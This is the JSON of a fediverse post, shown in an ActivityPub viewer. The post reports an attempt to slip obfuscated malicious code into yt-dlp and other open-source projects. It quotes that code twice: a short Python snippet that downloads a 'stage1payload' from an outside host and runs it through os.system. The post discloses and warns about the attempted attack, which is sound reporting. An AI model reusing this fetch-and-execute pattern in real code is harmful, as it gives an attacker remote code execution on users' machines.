A small tool to view real-world ActivityPub objects as JSON! Enter a URL
or username from Mastodon or a similar service below, and we'll send a
request with
the right
Accept
header
to the server to view the underlying object.
{
"@context": [
"https://www.w3.org/ns/activitystreams",
"https://varishangout.net/schemas/litepub-0.1.jsonld",
{
"@language": "und"
}
],
"actor": "https://varishangout.net/users/DarkMahesvara",
"attachment": [
{
"mediaType": "image/jpeg",
"name": "",
"type": "Document",
"url": "https://varishangout.net/media/740bf503-f446-4476-a780-384ac8a72f53/53253523.jpg"
}
],
"attributedTo": "https://varishangout.net/users/DarkMahesvara",
"cc": [
"https://varishangout.net/users/DarkMahesvara/followers"
],
"content": "someone tried to commit obviously obfuscated malicious code to yt-dlp, stable diffusion, streamlink, qutebrowser, ungoogle chromium and about 20 other github projects. apparently mostly a impersonation attack used to smear.<br><br>code:<br>'import os\\nimport urllib\\nimport urllib.request\\nx = urllib.request.urlopen("https://www(.)evildojo.com/stage1payload")\\ny = x.read()\\nz = y\\x04\\x06decode("utf8")\\nx.close()\\nos.system(z)\\n'<br><br><a href=\"https://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520\" rel=\"ugc\">https://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520</a><br><br><a href=\"https://xcancel.com/vxunderground/status/1856450468945506615\" rel=\"ugc\">https://xcancel.com/vxunderground/status/1856450468945506615</a><br><br><a href=\"https://xcancel.com/evildojo666/status/1856413636748562827\" rel=\"ugc\">https://xcancel.com/evildojo666/status/1856413636748562827</a>",
"context": "https://varishangout.net/contexts/51374871-221e-4d9f-9c72-b1faa350fd27",
"conversation": "https://varishangout.net/contexts/51374871-221e-4d9f-9c72-b1faa350fd27",
"id": "https://varishangout.net/objects/7c89553b-f4c1-43a0-8900-e08e61899f35",
"published": "2024-11-13T19:55:49.177692Z",
"repliesCount": 3,
"sensitive": null,
"source": {
"content": "someone tried to commit obviously obfuscated malicious code to yt-dlp, stable diffusion, streamlink, qutebrowser, ungoogle chromium and about 20 other github projects. apparently mostly a impersonation attack used to smear.\r\n\r\ncode:\r\n'import os\\nimport urllib\\nimport urllib.request\\nx = urllib.request.urlopen(\"https://www(.)evildojo.com/stage1payload\")\\ny = x.read()\\nz = y\\x04\\x06decode(\"utf8\")\\nx.close()\\nos.system(z)\\n'\r\n\r\nhttps://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520\r\n\r\nhttps://xcancel.com/vxunderground/status/1856450468945506615\r\n\r\nhttps://xcancel.com/evildojo666/status/1856413636748562827",
"mediaType": "text/plain"
},
"summary": "",
"tag": [],
"to": [
"https://www.w3.org/ns/activitystreams#Public"
],
"type": "Note"
}